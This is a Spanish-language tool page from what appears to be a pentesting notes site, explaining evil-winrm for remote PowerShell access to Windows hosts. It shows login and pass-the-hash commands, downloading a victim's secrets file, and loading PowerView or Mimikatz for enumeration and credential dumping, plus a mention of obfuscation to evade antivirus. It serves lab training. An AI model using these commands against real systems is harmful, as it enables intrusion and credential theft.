Security Layer
Research Articles 🔎🎵👽GitHub
  • Bienvenido a Security Layer
  • 👾Hack The Box
    • 👾HACK THE BOX
    • Archetype
    • Responder
    • Three
  • Crocodile
  • Unrested
  • Shibboleth
  • Active
  • Bastion
  • Access
  • Devel
  • Optimum
  • Cicada
  • Forest
  • Sauna
  • Support
  • 👾Try Hackme
    • 👾TRY HACKME
    • Attacking Kerberos
  • 🛠️Tools
    • 🛠️Tools
    • Suite Impacket
    • SMBmap
    • SMBclient
    • WinPEAS
    • EvilWinRM
  • Wfuzz
  • Responder
  • John The Ripper
  • Gobuster
  • Hydra
  • Ffuf
  • nxc
  • Enum4Linux/Enum4Linux-ng
  • Crear Diccionarios
  • Kerbrute
  • Microsoft Windows
    • MSSQL
    • Glosario
  • ⚠️Scripts
    • Shell.ps1
    • Common shell Payloads
  • Comand Line Tools
    • Comand Line Tools Linux
    • Wget
    • Strings
    • Compartir y descargar recursos
    • Comand Line Tools Windows
    • Enumerar permisos de usuarios
    • Listar o identificar ficheros especificos
  • AWS
    • Conexiones a Bucket s3
Powered by GitBook
On this page
  • 🔎 ¿Qué es evil-winrm?
  • ⚔️ ¿Por qué es tan usada en seguridad ofensiva?
  • 🧰 Funciones críticas y potentes de evil-winrm:
  • 🧠 Casos de uso típicos en pentest:
  1. Tools

EvilWinRM

🔎 ¿Qué es evil-winrm?

evil-winrm es una herramienta escrita en Ruby que permite conectarse a una máquina Windows mediante el servicio WinRM (Windows Remote Management), el cual funciona sobre los puertos 5985 (HTTP) o 5986 (HTTPS).

WinRM es el equivalente moderno de RDP o PowerShell Remoting, y está basado en el protocolo WS-Management.


⚔️ ¿Por qué es tan usada en seguridad ofensiva?

Porque te da una shell interactiva con PowerShell en sistemas Windows con acceso remoto habilitado. Esto es mucho más poderoso que una simple reverse shell. Es como tener un "PowerShell nativo" corriendo con privilegios del usuario que comprometiste.


🧰 Funciones críticas y potentes de evil-winrm:

1. 🔐 Acceso remoto con credenciales

Puedes conectarte con solo un usuario y contraseña:

┌──(dante㉿hunter)-[/home/kali]
└─ evil-winrm -i 192.168.1.10 -u Administrator -p 'Password123!'

O con un hash NTLM (pass-the-hash):

┌──(dante㉿hunter)-[/home/kali]
└─ evil-winrm -i 192.168.1.10 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe'

2. 📂 Carga y descarga de archivos

Subís o bajás archivos fácilmente dentro de la sesión:

┌── powershell
└─ upload ./linpeas.ps1 C:\Users\victim\Desktop\
download C:\Users\victim\Desktop\secrets.txt ./secrets.txt

3. 💣 Ejecución de scripts en PowerShell

Ideal para ejecutar herramientas como:

  • PowerView.ps1 → Para enumeración de Active Directory.

  • SharpHound.ps1 → Para recolectar datos para BloodHound.

  • Invoke-Mimikatz.ps1 → Para volcado de credenciales.

┌── powershell
└─ *Evil-WinRM* PS > . .\PowerView.ps1
*Evil-WinRM* PS > Get-NetUser

4. 🧪 Soporte para plugins

Puedes ampliar evil-winrm con plugins que permiten hacer cosas como:

  • Enumeración del sistema.

  • Ejecutar herramientas post-exploitation automáticamente.

  • Volcar credenciales.

  • Enumerar shares o servicios.


5. 🛡️ Evasión y ejecución sigilosa

Al tener acceso a PowerShell directamente, podés ejecutar comandos más sigilosos y complejos, evitando soluciones antivirus simples si sabés cómo ofuscar scripts.


🧠 Casos de uso típicos en pentest:

  • Post-exploitation tras obtener credenciales.

  • Movimiento lateral en entornos Windows con WinRM habilitado.

  • Recuperación de secretos desde archivos, SAM, o servicios en ejecución.

  • Recolección de datos para escalamiento de privilegios.

Last updated 19 days ago

Ver maquinas: (HTB), (HTB), (HTB)

🛠️
Responder
Archetype
Cicada